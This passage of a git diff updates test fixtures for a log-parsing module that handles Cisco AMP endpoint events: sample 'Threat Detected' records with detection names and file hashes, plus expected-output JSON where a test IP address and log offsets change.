+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
index 644eb52e4236..1faa7cd6a2ab 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -52,7 +52,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -64,7 +64,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -104,7 +104,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 1317,
+        "log.offset": 1322,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -115,7 +115,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -127,7 +127,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -167,7 +167,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 2642,
+        "log.offset": 2652,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -178,7 +178,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -190,7 +190,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -230,7 +230,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 3967,
+        "log.offset": 3982,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -241,7 +241,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -253,7 +253,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -293,7 +293,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 5292,
+        "log.offset": 5312,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -304,7 +304,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -316,7 +316,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -356,7 +356,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 6617,
+        "log.offset": 6642,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -367,7 +367,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -379,7 +379,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -419,7 +419,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 7942,
+        "log.offset": 7972,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -430,7 +430,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -442,7 +442,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -482,7 +482,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 9267,
+        "log.offset": 9302,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -493,7 +493,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -505,7 +505,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -545,7 +545,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 10592,
+        "log.offset": 10632,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -556,7 +556,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -568,7 +568,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -608,7 +608,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 11917,
+        "log.offset": 11962,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -619,7 +619,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -631,7 +631,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -671,7 +671,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 13242,
+        "log.offset": 13292,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -682,7 +682,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -694,7 +694,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -734,7 +734,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 14567,
+        "log.offset": 14622,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -745,7 +745,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -757,7 +757,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -797,7 +797,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 15892,
+        "log.offset": 15952,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -808,7 +808,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -820,7 +820,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -860,7 +860,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 17217,
+        "log.offset": 17282,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -871,7 +871,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -883,7 +883,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -923,7 +923,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 18542,
+        "log.offset": 18612,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -934,7 +934,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -946,7 +946,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -986,7 +986,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 19867,
+        "log.offset": 19942,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -997,7 +997,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1009,7 +1009,7 @@
         "@timestamp": "2021-01-15T10:17:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
